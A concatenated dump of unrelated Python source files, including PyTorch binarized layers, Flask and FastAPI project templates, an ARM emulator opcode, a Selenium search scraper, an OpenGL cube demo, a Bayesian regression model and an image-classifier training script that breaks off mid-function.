updated_environment = wizard(definition)
save(env_file, updated_environment)
return updated_environment
print(get_environment())
|
15,134 | 60b50c98682b065b531597e0b1057d78dafeb8cc | elif text == "INV /":
self.__model.invDiv()
|
15,135 | e0c61dc6a475c50570affacc6f5bb0314af8cd33 | # -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
import torch
import torch.nn.functional as F
from torch.autograd import Function
from torch.distributions.binomial import Binomial
def where(cond, x1, x2):
return cond.float() * x1 + (1. - cond.float()) * x2
class BinaryLinearFunction(Function):
@classmethod
def forward(cls, ctx, input, weight, bias=None):
ctx.save_for_backward(input, weight, bias)
ctx.intermediate_results = weight_b = cls._get_binary(weight)
output = input.mm(weight_b.t())
if bias is not None:
output += bias.unsqueeze(0).expand_as(output)
return output
@classmethod
def _get_binary(cls, weight):
return where(weight, 1., -1.)
@classmethod
def backward(cls, ctx, grad_output):
input, weight, bias = ctx.saved_variables
weight_b = ctx.intermediate_results
grad_input = grad_weight = grad_bias = None
if ctx.needs_input_grad[0]:
grad_input = grad_output.mm(weight_b)
if ctx.needs_input_grad[1]:
grad_weight = grad_output.t().mm(input)
if bias is not None and ctx.needs_input_grad[2]:
grad_bias = grad_output.sum(0).squeeze(0)
return grad_input, grad_weight, grad_bias
class StochasticLinearFunction(BinaryLinearFunction):
@classmethod
def _get_binary(cls, weight):
return torch.where(
torch.sign(weight - torch.empty(weight.shape).uniform_(-1, 1).cuda()) > 0,
torch.ones(weight.shape).cuda(), -torch.ones(weight.shape).cuda())
class LinearFunction(Function):
@classmethod
def forward(cls, ctx, input, weight, bias=None):
ctx.save_for_backward(input, weight, bias)
output = input.mm(weight.t())
if bias is not None:
output += bias.unsqueeze(0).expand_as(output)
return output
@classmethod
def backward(cls, ctx, grad_output):
input, weight, bias = ctx.saved_variables
grad_input = grad_weight = grad_bias = None
if ctx.needs_input_grad[0]:
grad_input = grad_output.mm(weight)
if ctx.needs_input_grad[1]:
grad_weight = grad_output.t().mm(input)
if bias is not None and ctx.needs_input_grad[2]:
grad_bias = grad_output.sum(0).squeeze(0)
return grad_input, grad_weight, grad_bias
class BinaryStraightThroughFunction(Function):
@staticmethod
def forward(ctx, input):
ctx.save_for_backward(input)
output = where(input>=0, 1, -1)
return output
@staticmethod
def backward(ctx, grad_output):
input = ctx.saved_variables
grad_input = grad_output.clone()
grad_input = grad_input * where(torch.abs(input[0]) <= 1, 1., 0.)
return grad_input
binary_linear = BinaryLinearFunction.apply
stoch_binary_linear = StochasticLinearFunction.apply
linear = LinearFunction.apply
bst = BinaryStraightThroughFunction.apply
|
15,136 | 82a40cc491c81f1d52bb2fbca1acc6489eb2fde4 | from util import save_wav
import sound_recorder
WAVE_OUTPUT_FILENAME = "output.wav"
def main():
sound_recorder.live_amplitude_spectrum()
# data = sound_recorder.record(25)
# save_wav(data, filename=WAVE_OUTPUT_FILENAME, channels=sound_recorder.CHANNELS)
if __name__ == '__main__':
main()
|
15,137 | 818a98045c3973746a7a4763e2e0692d68dfd35b | BLUEPRINTS = {
'flask': {
'__init__': {
'db': (
"import os"
"\nfrom flask import Flask"
"\nfrom flask_sqlalchemy import SQLAlchemy"
"\nfrom flask_migrate import Migrate\n"
"\napp = Flask(__name__)"
"\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY')"
"\napp.config['SQLALCHEMY_DATABASE_URI'] = os.getenv('DATABASE_URL')\n"
"\ndb = SQLAlchemy(app)"
"\nmigrate = Migrate(app, db)\n"
"\nfrom app.models import *"
"\ndb.create_all()"
"\ndb.session.commit()\n"
"\nfrom app import routes\n"
),
'nodb': (
"import os"
"\nfrom flask import Flask\n"
"\napp = Flask(__name__)"
"\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY')\n"
"\nfrom app import routes\n"
),
},
'wsgi': (
"from dotenv import load_dotenv"
"\nload_dotenv()\n"
"\nfrom app import app\n"
"\nif __name__ == '__main__':"
"\n app.run(debug=True)\n"
),
'routes': {
'db': (
"# Create your routes here.\n"
"\nfrom app import app, db\n"
"\nfrom app.models import *\n"
"\nfrom flask import Response\n"
"\n@app.route('/')"
"\ndef default():"
"\n return Response(status=200)\n"
),
'nodb': (
"# Create your routes here.\n"
"\nfrom app import app\n"
"\nfrom flask import Response\n"
"\n@app.route('/')"
"\ndef default():"
"\n return Response(status=200)\n"
),
},
'models': (
"# Create your models here.\n"
"\nfrom app import db\n"
"\nfrom sqlalchemy import Column, Integer\n"
"\nclass ExampleModel(db.Model):"
"\n id = Column(Integer, primary_key=True)\n"
),
'forms': (
"# Create your forms here.\n"
"\nfrom flask_wtf import FlaskForm"
"\nfrom wtforms import StringField"
"\nfrom wtforms.validators import DataRequired\n"
"\nclass ExampleForm(FlaskForm):"
"\n example_field = StringField('Example', validators=[DataRequired()])\n"
),
},
'fastapi': {
'asgi': (
"from dotenv import load_dotenv"
"\nload_dotenv()\n"
"\nfrom os import getenv"
"\nfrom fastapi import FastAPI\n"
"\nimport routers"
"\nfrom db import models, DB_ENGINE\n"
"\napp: FastAPI = FastAPI("
"\n debug=True if getenv('DEBUG') else False,"
"\n docs_url='/docs' if getenv('DEBUG') else False,"
"\n redoc_url='/redoc' if getenv('DEBUG') else False,"
"\n title=getenv('PROJECT_NAME')"
"\n)\n"
"\nmodels.DB_BASE.metadata.create_all(DB_ENGINE)\n"
"\napp.include_router(routers.server.router)\n"
"\nif __name__ == '__main__':"
"\n import uvicorn, psycopg2"
"\n uvicorn.run(app, host='127.0.0.1', port=8000) # alternatively host='localhost'\n"
),
'__init__db': (
"from os import getenv\n"
"\nfrom sqlalchemy import create_engine"
"\nfrom sqlalchemy.ext.declarative import declarative_base"
"\nfrom sqlalchemy.orm import sessionmaker"
"\nfrom sqlalchemy.orm.attributes import flag_modified\n"
"\nuri = getenv('DATABASE_URL')"
"\nif uri.startswith('postgres://'):"
"\n uri = uri.replace('postgres://', 'postgresql://', 1)\n"
"\nif getenv('DEBUG'):"
"\n DB_ENGINE = create_engine(uri, connect_args={'check_same_thread': False})"
"\nelse:"
"\n DB_ENGINE = create_engine(uri)"
"\ndel uri\n"
"\nDB_SES_LOCAL = sessionmaker(bind=DB_ENGINE)"
"\nDB_BASE = declarative_base()\n"
"\ndef get_db():"
"\n db = DB_SES_LOCAL()"
"\n try:"
"\n yield db"
"\n finally:"
"\n db.close()\n"
),
'models': (
"# Create your models here.\n"
"\nfrom sqlalchemy import Column, Integer, String\n"
"\nfrom db import DB_BASE\n"
"\nclass Exacple(DB_BASE):"
"\n __tablename__ = 'example'\n"
"\n id = Column(Integer, primary_key=True, index=True)\n"
),
'__init__utils': (
"from .hashing import *\n"
),
'schemas': (
"# Create your schemas here.\n"
"\nfrom typing import List, Optional"
"\nfrom pydantic import BaseModel\n"
"\nclass Example(BaseModel):"
"\n example_field: str\n"
),
'hashing': (
"from passlib.context import CryptContext\n"
"\nPWD_CXT = CryptContext(schemes=['bcrypt'], deprecated='auto')\n"
"\nclass Hash():"
"\n def bcrypt(password: str):"
"\n return PWD_CXT.hash(password)\n"
"\n def verify(plain_password, hashed_password):"
"\n return PWD_CXT.verify(plain_password, hashed_password)\n"
),
'__init__routers': (
"from os import getenv\n"
"\nfrom fastapi import APIRouter, Depends"
"\nfrom sqlalchemy.orm import Session\n"
"\nfrom db import *"
"\nfrom db.models import *\n"
"\nfrom utils import *\n"
"\nfrom .server import router\n"
),
'server': (
"from . import *\n"
"\nrouter = APIRouter(tags=['Server'])\n"
"\n@router.get('/')"
"\ndef default():"
"\n return {'status': 'Live'}\n"
),
},
}
|
15,138 | 0a3443baec4070da460944f51bbcf06d175e6434 | class Solution:
def findComplement(self, num: int) -> int:
bin_string = bin(num)[2:]
ch = ['0','b']
for c in bin_string:
if c=='0':
ch.append('1')
else:
ch.append('0')
return int(''.join(ch), 2)
|
15,139 | aa97397a5dcd5354488ef5f6e2384b8ed3093ef2 | from armulator.armv6.opcodes.abstract_opcodes.str_immediate_thumb import StrImmediateThumb
from armulator.armv6.opcodes.opcode import Opcode
from armulator.armv6.bits_ops import zero_extend
from armulator.armv6.arm_exceptions import UndefinedInstructionException
class StrImmediateThumbT4(StrImmediateThumb, Opcode):
def __init__(self, instruction, add, wback, index, t, n, imm32):
Opcode.__init__(self, instruction)
StrImmediateThumb.__init__(self, add, wback, index, t, n, imm32)
def is_pc_changing_opcode(self):
return False
@staticmethod
def from_bitarray(instr, processor):
imm8 = instr[24:32]
wback = instr[23]
add = instr[22]
index = instr[21]
rt = instr[16:20]
rn = instr[12:16]
if rn == "0b1111" or (not index and not wback):
raise UndefinedInstructionException()
elif rt.uint in (13, 15) or (wback and rn.uint == rt.uint):
print "unpredictable"
else:
imm32 = zero_extend(imm8, 32)
return StrImmediateThumbT4(instr, **{"add": add, "wback": wback, "index": index, "t": rt.uint,
"n": rn.uint, "imm32": imm32})
|
15,140 | 34145b6c9e7ccb41d5ff761885522b5aeb4a4b0b | #-*- coding: UTF-8 -*-
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import requests
#중요 태그 : div, li
driver = webdriver.Chrome('C:/Users/Heain/Desktop/2018_FastCampus/Python/Intermediate/chromedriver.exe')
#windows에서 실행할 경우 실행파일의 모든 경로를 작성해야함
my_query = '인공지능'
try :
driver.get('https://naver.com') #사이트로 이동
elem = driver.find_element_by_id('query')
elem.send_keys(my_query) #searching for
elem.send_keys(Keys.RETURN) #enter
try:
print('-'*10,'BLOG TITLES','-'*10)
elem = driver.find_element_by_class_name('_blogBase')
lis = elem.find_elements_by_tag_name('li')
for li in lis:
atag = li.find_element_by_class_name('sh_blog_title')
print(atag.get_attribute('title')) #get_attribute 속성값에 있는 '값'을 가지고 오는 기능
print(atag.get_attribute('href')) #link 주소 가져오기
except Exception as e:
print('None')
try:
print('\n', '-'*10,'NEWS TITLES','-'*10)
elem = driver.find_element_by_class_name('news')
#lis = elem.find_elements_by_tag_name('li') #div하위 모든 li 정보까지 수집 (관련뉴스 포함)
lis = elem.find_elements_by_xpath('./ul/li') #./현재 위치의 하위 ul/ 하위 li만 가져오기
for li in lis:
atag = li.find_element_by_class_name('_sp_each_title')
print(atag.get_attribute('title'))
print(atag.get_attribute('href'))
except Exception as e:
print('None')
try:
print('\n','-'*10,'CAFE TITLES','-'*10)
elem = driver.find_element_by_class_name('_cafeBase')
lis = elem.find_elements_by_tag_name('li')
for li in lis:
atag= li.find_element_by_class_name('sh_cafe_title')
title = atag.get_attribute('title')
if not title: #속성으로 찾을 수 없을 경우
title = atag.text
print(title)
print(atag.get_attribute('href'))
except Exception as e:
print('None')
input()
except Exception as e:
print(e)
finally:
driver.quit()
|
15,141 | 4e9e75ae7a7283767eb3159ab80829ef221704e3 | import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
vertices = (
(1,-1,-1),
(1,1,-1),
(-1,1,-1),
(-1,-1,-1),
(1,-1,1),
(1,1,1),
(-1,-1,1),
(-1,1,1) )
edges = (
(0,1),
(0,3),
(0,4),
(2,1),
(2,3),
(2,7),
(6,3),
(6,4),
(6,7),
(5,1),
(5,4),
(5,7)
)
surfaces = (
(0,1,2,3),
(3,2,7,6),
(6,7,5,4),
(4,5,1,0),
(1,5,7,2),
(4,0,3,6)
)
colors = (
(1,0,0),
(0,1,0),
(0,0,1),
(1,0,1),
(1,1,0),
(1,0,0),
(0,1,0),
(0,0,1),
(1,0,1),
(1,1,0),
(0,1,1)
)
class CubeObject():
def __init__(self, xoffset, yoffset, zoffset ):
self._vertices = []
for vertex in vertices:
for vertex in vertices:
newVertex = (vertex[0]+xoffset, vertex[1]+yoffset, vertex[2]+zoffset )
self._vertices.append( newVertex )
def render(self):
glBegin( GL_QUADS )
glColor( 0, 1, 0 )
for surface in surfaces:
for vertex in surface:
glVertex3fv( vertices[vertex] )
glEnd()
glBegin( GL_LINES )
glColor( 0, 0, 0 )
for edge in edges:
for vertex in edge:
glVertex3fv(vertices[vertex])
glEnd()
def cube():
glBegin( GL_QUADS )
colorIndex = 0
for surface in surfaces:
# thisColor = colors[colorIndex]
# glColor( thisColor[0], thisColor[1], thisColor[2] )
colorIndex += 1
for vertex in surface:
thisColor = colors[colorIndex]
glColor( thisColor[0], thisColor[1], thisColor[2] )
glVertex3fv( vertices[vertex] )
glEnd()
glBegin( GL_LINES )
glColor( 0, 0, 0 )
for edge in edges:
for vertex in edge:
glVertex3fv(vertices[vertex])
glEnd()
def main():
pygame.init()
mycube = CubeObject( .1, .2, .3 )
mycube2 = CubeObject( .1, .8, .3 )
mycube3 = CubeObject( -1.0, .2, .9 )
display = (800,600)
pygame.display.set_mode( display, DOUBLEBUF|OPENGL )
gluPerspective( 45, (display[0]/display[1]), 0.1, 50.0 )
glTranslate( 0,0,-5)
glRotatef(0,0,0,0)
while True:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
glTranslate( -0.1,0,0)
if event.key == pygame.K_RIGHT:
glTranslate( .1,0,0)
if event.type == MOUSEBUTTONDOWN:
if event.button == 4:
glTranslate( 0,0,1)
if event.button == 5:
glTranslate( 0,0,-1)
glClear( GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT )
# cube()
mycube.render()
mycube2.render()
mycube3.render()
pygame.display.flip()
pygame.time.wait(10)
#glRotatef( .5,1,1.5,0)
main()
|
15,142 | d97dd7345c1522f2e10ba314525e478e7422edaa | #!python3
"""
##### Task 1
Ask the user to enter an integer.
Print the multiplication tables up to 12 for that number
using a for loop instead of a while loop.
(2 points)
inputs:
int number
outputs:
multiples of that number
example:
Enter number:4
4 8 12 16 20 24 28 32 36 40 44 48
"""
number = input("Enter number:")
number = int(number)
for i in range(1, 13):
print(number * i, end=" ") |
15,143 | 63afc72dad731d0df390427467ea0fdb997da5ab | #!/usr/bin/env python
import os
import pickle
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
tf_bijs = tfp.bijectors
tf_dist = tfp.distributions
tf_mean_field = tfp.layers.default_mean_field_normal_fn
#==============================================================
class RegressionModel(object):
NUM_SAMPLES = 1
ACT_FUNC = 'leaky_relu'
ACT_FUNC_OUT = 'linear'
LEARNING_RATE = 0.75 * 10**-3
MLP_SIZE = 48
REG = 1e-3
DROP = 0.1
def __init__(self, graph, dataset_details, config, scope, batch_size, max_iter = 10**8):
self.graph = graph
self.scope = scope
self.config = config
self.batch_size = batch_size
self.dataset_details = dataset_details
self.max_iter = max_iter
self.is_graph_constructed = False
self._read_scaling_details()
def _generator(self, features, targets, batch_size):
indices = np.arange(len(features))
while True:
np.random.shuffle(indices)
batch_features = features[indices[:batch_size]]
batch_targets = targets[indices[:batch_size]]
yield (batch_features, batch_targets)
def _read_scaling_details(self):
with open(self.dataset_details, 'rb') as content:
details = pickle.load(content)
self.scaling = {key: details[key] for key in details}
self.features_shape = self.scaling['features_shape']
self.targets_shape = self.scaling['targets_shape']
def get_scaled_features(self, features):
if self.config['feature_rescaling'] == 'standardization':
scaled = (features - self.scaling['mean_features']) / self.scaling['std_features']
elif self.config['feature_rescaling'] == 'unit_cube':
scaled = (features - self.scaling['min_features']) / (self.scaling['max_features'] - self.scaling['min_features'])
return scaled
def get_scaled_targets(self, targets):
if self.config['target_rescaling'] == 'standardization':
scaled = (targets - self.scaling['mean_targets']) / self.scaling['std_targets']
elif self.config['target_rescaling'] == 'unit_cube':
scaled = (targets - self.scaling['min_targets']) / (self.scaling['max_targets'] - self.scaling['min_targets'])
elif self.config['target_rescaling'] == 'mean':
scaled = targets / self.scaling['mean_targets']
elif self.config['target_rescaling'] == 'same':
scaled = targets
return scaled
def get_raw_targets(self, targets):
if self.config['target_rescaling'] == 'standardization':
raw = targets * self.scaling['std_targets'] + self.scaling['mean_targets']
elif self.config['target_rescaling'] == 'unit_cube':
raw = (self.scaling['max_targets'] - self.scaling['min_targets']) * targets + self.scaling['min_targets']
elif self.config['target_rescaling'] == 'mean':
raw = targets * self.scaling['mean_targets']
elif self.config['target_rescaling'] == 'same':
raw = targets
return raw
def set_hyperparameters(self, hyperparam_dict):
for key, value in hyperparam_dict.items():
setattr(self, key, value)
def construct_graph(self):
act_funcs = {
'linear': lambda y: y,
'leaky_relu': lambda y: tf.nn.leaky_relu(y, 0.2),
'relu': lambda y: tf.nn.relu(y),
'softmax': lambda y: tf.nn.softmax(y),
'softplus': lambda y: tf.nn.softplus(y),
'softsign': lambda y: tf.nn.softsign(y),
'sigmoid': lambda y: tf.nn.sigmoid(y),
}
mlp_activation = act_funcs[self.ACT_FUNC]
out_activation = act_funcs[self.ACT_FUNC_OUT]
with self.graph.as_default():
with tf.name_scope(self.scope):
self.is_training = tf.compat.v1.placeholder(tf.bool, shape = ())
self.x_ph = tf.compat.v1.placeholder(tf.float32, [self.batch_size, self.features_shape[1]])
self.y_ph = tf.compat.v1.placeholder(tf.float32, [self.batch_size, self.targets_shape[1]])
self.layer_0 = tfp.layers.DenseLocalReparameterization(
self.MLP_SIZE,
activation = mlp_activation,
)
layer_0_act = self.layer_0(self.x_ph)
layer_0_out = tf.layers.dropout(layer_0_act, rate = self.DROP, training = self.is_training)
self.layer_1 = tfp.layers.DenseLocalReparameterization(
self.MLP_SIZE,
activation = mlp_activation,
)
layer_1_act = self.layer_1(layer_0_out)
layer_1_out = tf.layers.dropout(layer_1_act, rate = self.DROP, training = self.is_training)
self.layer_2 = tfp.layers.DenseLocalReparameterization(
self.MLP_SIZE,
activation = mlp_activation,
)
layer_2_act = self.layer_2(layer_1_out)
layer_2_out = layer_2_act
self.layer_3 = tfp.layers.DenseLocalReparameterization(
self.targets_shape[1],
activation = out_activation,
)
layer_3_out = self.layer_3(layer_2_out)
self.net_out = layer_3_out
self.scales = tf.nn.softplus(tf.Variable(tf.zeros(1)))
self.y_pred = tf_dist.Normal(self.net_out, scale = self.scales)
def construct_inference(self):
self.is_graph_constructed = True
with self.graph.as_default():
self.kl = sum(self.layer_0.losses) / float(self.batch_size)
self.kl += sum(self.layer_1.losses) / float(self.batch_size)
self.kl += sum(self.layer_2.losses) / float(self.batch_size)
self.kl += sum(self.layer_3.losses) / float(self.batch_size)
self.reg_loss = - tf.reduce_mean( self.y_pred.log_prob(self.y_ph) )
self.loss = self.reg_loss + self.REG * self.kl
self.optimizer = tf.compat.v1.train.AdamOptimizer(self.LEARNING_RATE)
self.train_op = self.optimizer.minimize(self.loss)
self.init_op = tf.group(tf.compat.v1.global_variables_initializer(), tf.compat.v1.local_variables_initializer())
self.sess = tf.compat.v1.Session(graph = self.graph)
with self.sess.as_default():
self.sess.run(self.init_op)
def train(self, train_features, train_targets, valid_features, valid_targets, model_path, plot = False, targets = 'same'):
from sklearn.metrics import r2_score
if not os.path.isdir(model_path): os.mkdir(model_path)
logfile = open('%s/logfile.dat' % model_path, 'w')
logfile.close()
if not self.is_graph_constructed: self.construct_inference()
train_feat_scaled = self.get_scaled_features(train_features)
train_targ_scaled = self.get_scaled_targets(train_targets)
valid_feat_scaled = self.get_scaled_features(valid_features)
valid_targ_scaled = self.get_scaled_targets(valid_targets)
min_target, max_target = np.minimum(np.amin(train_targets, axis = 0), np.amin(valid_targets, axis = 0)), np.maximum(np.amax(train_targets, axis = 0), np.amax(valid_targets, axis = 0))
if targets == 'probs':
min_target = 1. / (1. + np.exp( - min_target))
max_target = 1. / (1. + np.exp( - max_target))
batch_train_gen = self._generator(train_feat_scaled, train_targ_scaled, self.batch_size)
batch_valid_gen = self._generator(valid_feat_scaled, valid_targ_scaled, self.batch_size)
train_errors, valid_errors = [], []
with self.graph.as_default():
with self.sess.as_default():
self.saver = tf.compat.v1.train.Saver()
if plot:
import matplotlib.pyplot as plt
import seaborn as sns
colors = sns.color_palette('RdYlGn', 4)
plt.ion()
plt.style.use('dark_background')
fig = plt.figure(figsize = (14, 5))
ax0 = plt.subplot2grid((1, 3), (0, 0))
ax1 = plt.subplot2grid((1, 3), (0, 1))
ax2 = plt.subplot2grid((1, 3), (0, 2))
for epoch in range(self.max_iter):
train_x, train_y = next(batch_train_gen)
valid_x, valid_y = next(batch_valid_gen)
self.sess.run(self.train_op, feed_dict = {self.x_ph: train_x, self.y_ph: train_y, self.is_training: True})
if epoch % 200 == 0:
valid_preds = self.sess.run(self.net_out, feed_dict = {self.x_ph: valid_x, self.is_training: False})
valid_y = self.get_raw_targets(valid_y)
valid_preds = self.get_raw_targets(valid_preds)
if targets == 'probs':
valid_y = 1. / (1. + np.exp( - valid_y))
valid_preds = 1. / (1. + np.exp( - valid_preds))
try:
valid_r2 = r2_score(valid_y, valid_preds)
except:
valid_r2 = np.nan
valid_errors.append(valid_r2)
_1_, _2_ = self.sess.run([self.reg_loss, self.kl], feed_dict = {self.x_ph: train_x, self.y_ph: train_y, self.is_training: False})
print('...', _1_, _2_)
train_preds = self.sess.run(self.net_out, feed_dict = {self.x_ph: train_x, self.is_training: False})
train_y = self.get_raw_targets(train_y)
train_preds = self.get_raw_targets(train_preds)
try:
train_r2 = r2_score(train_y, train_preds)
except:
train_r2 = np.nan
train_errors.append(train_r2)
if targets == 'probs':
train_y = 1. / (1. + np.exp( - train_y))
train_preds = 1. / (1. + np.exp( - train_preds))
logfile = open('%s/logfile.dat' % model_path, 'a')
logfile.write('%d\t%.5f\t%.5f\n' % (epoch, train_r2, valid_r2))
logfile.close()
# define break condition --> last improvement happened more than 100 epochs ago
max_r2_index = np.argmax(valid_errors)
if len(valid_errors) - max_r2_index > 100: break
if max_r2_index == len(valid_errors) - 1:
self.saver.save(self.sess, '%s/model.ckpt' % model_path)
new_line = 'EVALUATION: %d (%d)\t%.5f\t%.5f' % ( len(valid_errors) - max_r2_index, len(valid_errors), train_errors[-1], valid_errors[-1])
print(new_line)
if plot:
train_preds_scaled = train_preds
train_trues_scaled = train_y
valid_preds_scaled = valid_preds
valid_trues_scaled = valid_y
ax0.cla()
ax1.cla()
ax2.cla()
ax0.plot([min_target[0], max_target[0]], [min_target[0], max_target[0]], lw = 3, color = 'w', alpha = 0.5)
ax0.plot(train_trues_scaled[:, 0], train_preds_scaled[:, 0], marker = '.', ls = '', color = colors[-1], alpha = 0.5)
ax0.plot(valid_trues_scaled[:, 0], valid_preds_scaled[:, 0], marker = '.', ls = '', color = colors[0], alpha = 0.5)
if len(min_target) > 1:
ax1.plot([min_target[1], max_target[1]], [min_target[1], max_target[1]], lw = 3, color = 'w', alpha = 0.5)
ax1.plot(train_trues_scaled[:, 1], train_preds_scaled[:, 1], marker = '.', ls = '', color = colors[-1], alpha = 0.5)
ax1.plot(valid_trues_scaled[:, 1], valid_preds_scaled[:, 1], marker = '.', ls = '', color = colors[0], alpha = 0.5)
RANGE = 50
ax2.plot(np.arange(len(train_errors[-RANGE:])) + len(train_errors[-RANGE:]), train_errors[-RANGE:], lw = 3, color = colors[-1])
ax2.plot(np.arange(len(valid_errors[-RANGE:])) + len(valid_errors[-RANGE:]), valid_errors[-RANGE:], lw = 3, color = colors[0])
plt.pause(0.05)
def restore(self, model_path):
if not self.is_graph_constructed: self.construct_inference()
self.sess = tf.compat.v1.Session(graph = self.graph)
self.saver = tf.compat.v1.train.Saver()
try:
self.saver.restore(self.sess, model_path)
return True
except AttributeError:
return False
def predict(self, input_raw):
input_scaled = self.get_scaled_features(input_raw)
with self.sess.as_default():
output_scaled = []
for _ in range(self.NUM_SAMPLES):
output_scaled.append(self.sess.run(self.net_out, feed_dict = {self.x_ph: input_scaled, self.is_training: False}))
output_scaled = np.array(output_scaled)
output_raw = self.get_raw_targets(output_scaled)
output_raw_mean = np.mean(output_raw, axis = 0)
output_raw_std = np.std(output_raw, axis = 0)
return {'samples': output_raw, 'averages': output_raw_mean, 'uncertainties': output_raw_std}
#==============================================================
|
15,144 | e47330768491b72c9bf43337c706d03d635ca720 | ################################################################################
# Experiment No. 11
#
# Generating weekly heatmaps for stations
#
#
|
15,145 | 976d468cd39493e7410ca9ce30e217b1345b6a25 | import os
import pandas as pd
import torch
import torch.nn as nn
from torchvision import datasets,models,transforms
from torch.utils.tensorboard import SummaryWriter
import time, os, copy
image_transforms = {
'train': transforms.Compose([
transforms.RandomResizedCrop(size=256, scale=(0.8, 1.0)),
transforms.RandomRotation(degrees=15),
transforms.CenterCrop(size=224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
]),
'valid': transforms.Compose([
transforms.Resize(size=256),
transforms.CenterCrop(size=224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])
])
}
train_path='/home/abhinav/kaggle/intel_image_classification/input/train/'
val_path='/home/abhinav/kaggle/intel_image_classification/input/val/'
saving_path={
'mobile_net':"/home/abhinav/kaggle/intel_image_classification/models/mobilenetv2.pth",
'resnet50':"/home/abhinav/kaggle/intel_image_classification/models/resnet50.pth",
'SpinalNet_ResNet':"/home/abhinav/kaggle/intel_image_classification/models/SpinalNet_ResNet.pth"
}
dataset = {
'train': datasets.ImageFolder(root=train_path, transform=image_transforms['train']),
'valid': datasets.ImageFolder(root=val_path, transform=image_transforms['valid'])
}
dataset_sizes = {
'train':len(dataset['train']),
'valid':len(dataset['valid'])
}
dataloaders = {
'train':torch.utils.data.DataLoader(dataset['train'], batch_size=32, shuffle=True),
'valid':torch.utils.data.DataLoader(dataset['valid'], batch_size=32, shuffle=True,)
}
class_names = dataset['train'].classes
print("Classes:", class_names)
print("Training-set size:",dataset_sizes['train'],
"\nValidation-set size:", dataset_sizes['valid'])
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print(device," is available")
# print("\nLoading mobilenetv2 ...\n")
# model_ft = models.mobilenet_v2(pretrained=True)
# for params in list(model_ft.parameters())[0:-5]:
# params.requires_grad = False
# model_ft = models.resnet50(pretrained=True)
# for params in list(model_ft.parameters())[0:-5]:
# params.requires_grad = False
# # num_ftrs=model_ft.classifier[-1].in_features
# num_ftrs = model_ft.fc.in_features
# model_ft.fc=nn.Sequential(
# nn.Dropout(p=0.2, inplace=False),
# nn.Linear(in_features=num_ftrs, out_features=6, bias=True)
# )
# model_ft = model_ft.to(device)
model_ft = models.resnet50(pretrained=True)
num_ftrs = model_ft.fc.in_features
half_in_size = round(num_ftrs/2)
layer_width = 12 #Small for Resnet, large for VGG
Num_class=6
class SpinalNet_ResNet(nn.Module):
def __init__(self):
super(SpinalNet_ResNet, self).__init__()
self.fc_spinal_layer1 = nn.Sequential(
#nn.Dropout(p = 0.5),
nn.Linear(half_in_size, layer_width),
#nn.BatchNorm1d(layer_width),
nn.ReLU(inplace=True),)
self.fc_spinal_layer2 = nn.Sequential(
#nn.Dropout(p = 0.5),
nn.Linear(half_in_size+layer_width, layer_width),
#nn.BatchNorm1d(layer_width),
nn.ReLU(inplace=True),)
self.fc_spinal_layer3 = nn.Sequential(
#nn.Dropout(p = 0.5),
nn.Linear(half_in_size+layer_width, layer_width),
#nn.BatchNorm1d(layer_width),
nn.ReLU(inplace=True),)
self.fc_spinal_layer4 = nn.Sequential(
#nn.Dropout(p = 0.5),
nn.Linear(half_in_size+layer_width, layer_width),
#nn.BatchNorm1d(layer_width),
nn.ReLU(inplace=True),)
self.fc_out = nn.Sequential(
#nn.Dropout(p = 0.5),
nn.Linear(layer_width*4, Num_class),)
def forward(self, x):
x1 = self.fc_spinal_layer1(x[:, 0:half_in_size])
x2 = self.fc_spinal_layer2(torch.cat([ x[:,half_in_size:2*half_in_size], x1], dim=1))
x3 = self.fc_spinal_layer3(torch.cat([ x[:,0:half_in_size], x2], dim=1))
x4 = self.fc_spinal_layer4(torch.cat([ x[:,half_in_size:2*half_in_size], x3], dim=1))
x = torch.cat([x1, x2], dim=1)
x = torch.cat([x, x3], dim=1)
x = torch.cat([x, x4], dim=1)
x = self.fc_out(x)
return x
model_ft.fc=SpinalNet_ResNet()
model_ft.to(device)
# print('Model Summary:-\n')
for num, (name, param) in enumerate(model_ft.named_parameters()):
print(num, name, param.requires_grad )
# summary(model_ft, input_size=(3, 224, 224))
print(model_ft)
criterion = nn.CrossEntropyLoss()
optimizer_ft = torch.optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)
exp_lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)
print("\nTraining:-\n")
def train_model(model, criterion, optimizer, scheduler, num_epochs=30):
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
# Tensorboard summary
writer = SummaryWriter()
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'valid']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device, non_blocking=True)
labels = labels.to(device, non_blocking=True)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
if phase == 'train':
scheduler.step()
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print('{} Loss: {:.4f} Acc: {:.4f}'.format(
phase, epoch_loss, epoch_acc))
# Record training loss and accuracy for each phase
if phase == 'train':
writer.add_scalar('Train/Loss', epoch_loss, epoch)
writer.add_scalar('Train/Accuracy', epoch_acc, epoch)
writer.flush()
else:
writer.add_scalar('Valid/Loss', epoch_loss, epoch)
